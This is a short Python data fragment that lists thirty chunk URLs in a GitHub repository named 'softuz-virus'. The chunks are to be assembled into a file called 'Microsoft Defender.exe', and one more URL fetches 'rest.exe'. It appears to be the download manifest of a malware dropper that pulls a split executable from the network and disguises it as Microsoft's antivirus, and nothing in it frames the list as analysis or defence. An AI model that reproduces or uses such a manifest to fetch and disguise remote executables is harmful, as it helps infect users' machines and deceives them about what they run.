ls = [{"Microsoft Defender.exe": ['https://raw.githubusercontent.com/Yaxyobek0877/softuz-virus/main/fl_0.txt',
                                   'https://raw.githubusercontent.com/Yaxyobek0877/softuz-virus/main/fl_1.txt',
                                   'https://raw.githubusercontent.com/Yaxyobek0877/softuz-virus/main/fl_2.txt',
                                   'https://raw.githubusercontent.com/Yaxyobek0877/softuz-virus/main/fl_3.txt',
                                   'https://raw.githubusercontent.com/Yaxyobek0877/softuz-virus/main/fl_4.txt',
                                   'https://raw.githubusercontent.com/Yaxyobek0877/softuz-virus/main/fl_5.txt',
                                   'https://raw.githubusercontent.com/Yaxyobek0877/softuz-virus/main/fl_6.txt',
                                   'https://raw.githubusercontent.com/Yaxyobek0877/softuz-virus/main/fl_7.txt',
                                   'https://raw.githubusercontent.com/Yaxyobek0877/softuz-virus/main/fl_8.txt',
                                   'https://raw.githubusercontent.com/Yaxyobek0877/softuz-virus/main/fl_9.txt',
                                   'https://raw.githubusercontent.com/Yaxyobek0877/softuz-virus/main/fl_10.txt',
                                   'https://raw.githubusercontent.com/Yaxyobek0877/softuz-virus/main/fl_11.txt',
                                   'https://raw.githubusercontent.com/Yaxyobek0877/softuz-virus/main/fl_12.txt',
                                   'https://raw.githubusercontent.com/Yaxyobek0877/softuz-virus/main/fl_13.txt',
                                   'https://raw.githubusercontent.com/Yaxyobek0877/softuz-virus/main/fl_14.txt',
                                   'https://raw.githubusercontent.com/Yaxyobek0877/softuz-virus/main/fl_15.txt',
                                   'https://raw.githubusercontent.com/Yaxyobek0877/softuz-virus/main/fl_16.txt',
                                   'https://raw.githubusercontent.com/Yaxyobek0877/softuz-virus/main/fl_17.txt',
                                   'https://raw.githubusercontent.com/Yaxyobek0877/softuz-virus/main/fl_18.txt',
                                   'https://raw.githubusercontent.com/Yaxyobek0877/softuz-virus/main/fl_19.txt',
                                   'https://raw.githubusercontent.com/Yaxyobek0877/softuz-virus/main/fl_20.txt',
                                   'https://raw.githubusercontent.com/Yaxyobek0877/softuz-virus/main/fl_21.txt',
                                   'https://raw.githubusercontent.com/Yaxyobek0877/softuz-virus/main/fl_22.txt',
                                   'https://raw.githubusercontent.com/Yaxyobek0877/softuz-virus/main/fl_23.txt',
                                   'https://raw.githubusercontent.com/Yaxyobek0877/softuz-virus/main/fl_24.txt',
                                   'https://raw.githubusercontent.com/Yaxyobek0877/softuz-virus/main/fl_25.txt',
                                   'https://raw.githubusercontent.com/Yaxyobek0877/softuz-virus/main/fl_26.txt',
                                   'https://raw.githubusercontent.com/Yaxyobek0877/softuz-virus/main/fl_27.txt',
                                   'https://raw.githubusercontent.com/Yaxyobek0877/softuz-virus/main/fl_28.txt',
                                   'https://raw.githubusercontent.com/Yaxyobek0877/softuz-virus/main/fl_29.txt']
       }]

r = {"rest.exe": ["https://raw.githubusercontent.com/Yaxyobek0877/softuz-virus/main/rest.txt"]}
